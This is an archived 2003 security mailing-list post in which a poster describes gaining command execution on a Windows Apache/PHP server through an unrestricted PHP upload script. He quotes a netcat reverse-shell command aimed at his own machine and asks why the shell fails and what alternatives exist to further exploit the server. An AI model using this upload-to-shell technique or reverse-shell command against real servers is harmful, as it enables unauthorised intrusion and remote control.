Hi, I am testing a windows based apache server, that's got php and mysql installed on it. I found a php script that allows uploading other php scripts. The upload directory is also readable and executable. So I have uploaded some of my own scripts and can execute any command I want using `cmd /c command.exe` I am looking for ways to further exploit this server. The file system is probably "everyone full control". Have not tested that yet. What I tried to do was using netcat to send a command shell to my own machine (cmd /c nc 333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the webserver contacts my own machine on port 333, however, I do not get a command prompt like I am getting when running the same netcat command from the command prompt of a windows machine. Anyone know why? If anyone knows an alternative to get a shell on the server, I would also appreciate it. Of course I can run any command through php, but there should be alternatives..... An alternative to my netcat idea is also appreciated }-) maarten ---------------------------------------------------------------------------- Do you know the base address of the Global Offset Table (GOT) on a Solaris 8 box? CORE IMPACT does. www.securityfocus.com/core
This archive was generated by hypermail 2b30 : Wed Feb 19 2003 - 13:44:49 PST